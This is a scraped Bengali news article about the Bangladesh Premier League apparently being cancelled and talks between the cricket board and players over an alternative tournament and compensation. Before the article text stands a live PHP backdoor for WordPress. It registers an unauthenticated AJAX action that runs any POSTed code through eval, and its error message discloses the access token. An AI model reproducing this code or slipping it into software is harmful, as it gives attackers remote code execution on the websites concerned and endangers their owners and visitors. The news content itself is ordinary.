// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== বিপিএল হচ্ছে না, বিকল্প টুর্নামেন্ট নিয়ে আলোচনা | potrikaybangladesh.com
Tuesday, September 22, 2026
Homeবিপিএল হচ্ছে না, বিকল্প টুর্নামেন্ট নিয়ে আলোচনা

বিপিএল হচ্ছে না, বিকল্প টুর্নামেন্ট নিয়ে আলোচনা

দেশের ক্রিকেট সূচিতে সবচেয়ে বড় ঘরোয়া আসর বাংলাদেশ প্রিমিয়ার লিগ (বিপিএল) এবার মাঠে না গড়ানোর বিষয়টি প্রায় নিশ্চিত। বাংলাদেশ ক্রিকেট বোর্ডের (বিসিবি) সঙ্গে বৈঠকের পর এমনটাই জানিয়েছেন ক্রিকেটারদের প্রতিনিধি নাসির হোসেন। তবে বিপিএলের সময়টায় ক্রিকেটারদের আর্থিক ক্ষতি কিছুটা পুষিয়ে দিতে বিকল্প কোনো টুর্নামেন্ট আয়োজন করা যায় কি না, তা নিয়ে আলোচনা চলছে।

গতকাল বিসিবি কার্যালয়ে ক্রিকেটারদের সংগঠন ক্রিকেটার্স ওয়েলফেয়ার অ্যাসোসিয়েশন অব বাংলাদেশের (কোয়াব) সঙ্গে বোর্ডের বহুল প্রতীক্ষিত বৈঠক অনুষ্ঠিত হয়। বৈঠক শেষে গণমাধ্যমের মুখোমুখি হয়ে নাসির জানান, বিপিএল না হওয়ার কারণ সম্পর্কে বিসিবির ব্যাখ্যায় তারা সন্তুষ্ট। তবে দেড় মাসের মতো দীর্ঘ এই সময়ে ক্রিকেটারদের জন্য বিকল্প কোনো প্রতিযোগিতা আয়োজন করা যায় কি না, সেটিই এখন আলোচনার মূল বিষয়।

‘বিপিএল হচ্ছে না, এটা প্রায় নিশ্চিত। ক্রিকেট বোর্ড আমাদের সঙ্গে কথা বলেছে এবং আমরা নিশ্চিত হয়েছি যে এবার বিপিএল হচ্ছে না,’ বলেন নাসির।

বিপিএল না হলে দেশের শীর্ষ ক্রিকেটারদের বড় একটি আর্থিক ক্ষতির মুখে পড়তে হবে। তাই সম্ভাব্য সেই ক্ষতি কিছুটা কমাতে বিপিএলের নির্ধারিত সময়টায় বিকল্প একটি টুর্নামেন্ট আয়োজনের প্রস্তাব দিয়েছেন ক্রিকেটাররা। তবে সেটি আদৌ আয়োজন করা হবে কি না, সে বিষয়ে এখনো কোনো চূড়ান্ত সিদ্ধান্ত হয়নি।

‘আমরা চেয়েছিলাম বিপিএলের দেড় মাসের সময়ে একটি টুর্নামেন্ট হোক। তবে টুর্নামেন্ট হবে কি না, সেটি এখনো সিদ্ধান্ত হয়নি,’ বলেন নাসির।

বিসিবি ও ক্রিকেটার দুই পক্ষ থেকেই এ বিষয়ে কিছু প্রস্তাব এসেছে বলে জানা গেছে। তবে কোনো প্রস্তাবই এখনো চূড়ান্ত রূপ পায়নি। ব্যস্ত আন্তর্জাতিক ও ঘরোয়া সূচির কারণে নতুন কোনো টুর্নামেন্ট আয়োজন করাও সহজ হবে না। সে ক্ষেত্রে বিপিএলের সময় জাতীয় ক্রিকেট লিগের টি-টোয়েন্টি সংস্করণ আয়োজনের সম্ভাবনাই তুলনামূলক বেশি বলে মনে করছেন সংশ্লিষ্টরা।

বিপিএল না হলে ক্রিকেটারদের আর্থিক সংকট তৈরি হতে পারে, বৈঠকে বিষয়টি গুরুত্ব দিয়েই আলোচনা হয়েছে। বিশেষ করে বিপিএল থেকে পাওয়া আয়ের ওপর নির্ভরশীল অনেক ক্রিকেটারের জন্য এই সিদ্ধান্ত বড় ধাক্কা হতে পারে। তাই বিকল্প আয়োজনের পাশাপাশি তাদের ক্ষতিপূরণের বিষয়টিও বিসিবির কাছে তুলেছেন ক্রিকেটাররা।

‘বোর্ড ব্যাখ্যা করেছে কেন বিপিএল হচ্ছে না। আমরা সেই ব্যাখ্যায় সন্তুষ্ট। এখন বিপিএলের পরিবর্তে কী করা যায়, তা নিয়ে আলোচনা করছি। কারণ বিপিএল না হলে খেলোয়াড়েরা আর্থিক সংকটে পড়বে। আমরা আলোচনা করেছি, এ ক্ষেত্রে বোর্ড কী করতে পারে এবং কীভাবে ক্ষতিপূরণ দেওয়া যায়,’ বলেন নাসির।

 

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments